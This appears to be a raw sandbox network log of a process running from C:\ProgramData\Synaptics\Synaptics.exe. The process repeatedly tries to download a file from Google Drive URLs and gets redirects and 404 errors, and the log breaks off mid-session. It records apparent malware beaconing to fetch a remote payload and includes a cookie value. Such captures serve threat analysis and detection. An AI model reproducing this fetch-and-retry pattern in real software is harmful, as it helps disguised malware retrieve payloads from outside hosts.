                                                                                        2024-12-24 21:11:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:42 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC5ZRiUz5NVF2mP0u_ZVsZDEBOnXQC28AKyFRCynzL__a8CMZvu9nhsbEgCFBgc84JFIw5w_XAo
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:42 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vjgl7Th5SEbiqZaYJKFzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:42 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:42 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="WYm5UgfrzPWSi6zKijoiHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:42 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        34 | 192.168.2.4 | 49838 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:44 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:44 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-h4m1I-OnjlfATsqNHS5XmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        35 | 192.168.2.4 | 49839 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:44 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:44 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lnEkBp5xfcEoERgl8719Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        36 | 192.168.2.4 | 49841 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-s4U6dGxJJa5J38eDiuFPcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        37 | 192.168.2.4 | 49843 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VGIlEA-s4kiPpfoM2MboOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        38 | 192.168.2.4 | 49842 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:48 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC63DFsQz3sKHX5p44TO5CCb6KTyATAYZCq-VPMxjK-HiRJHwdl2dK97caE0JW5nk7c7twd5KXM
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:47 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uCmGXL5lZlXSeD9fBE_H1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:48 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:48 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="P9BHZZe6CJMSwSTXxRH9Yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:48 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        39 | 192.168.2.4 | 49844 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:48 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4tM4RNzm6pgjsCYwEWZyaTyQe_Pe6fNwaZ0Prrv-U2MD-A4qEbt19VF1hvTHkOKe8S
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:48 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-q8nhPTFmtj4YD-IYRr_0Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:48 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:48 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="fKmdcpzML-xbVUgAlSYVhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:48 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        40 | 192.168.2.4 | 49851 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:51 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC652bycUPoO2we3pLJ8LVCX_m5I7oRWsYNQfOKYI50ehht8hjhmOmhl8N9VeLHHnZof
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:50 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kHapn9SFc31QkqRiSGpa4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:51 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:51 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="hdvkvtSO82DIEdjqJfIb6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:51 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        41 | 192.168.2.4 | 49852 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:50 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ngr5LkPZ6-MeLKRC7hSewA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        42 | 192.168.2.4 | 49853 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:50 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8W6IdiZoDH901mXvpUtmnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        43 | 192.168.2.4 | 49861 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:54 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:54 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tpLNCYFUeqHeteW-YAb-5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        44 | 192.168.2.4 | 49862 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:54 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
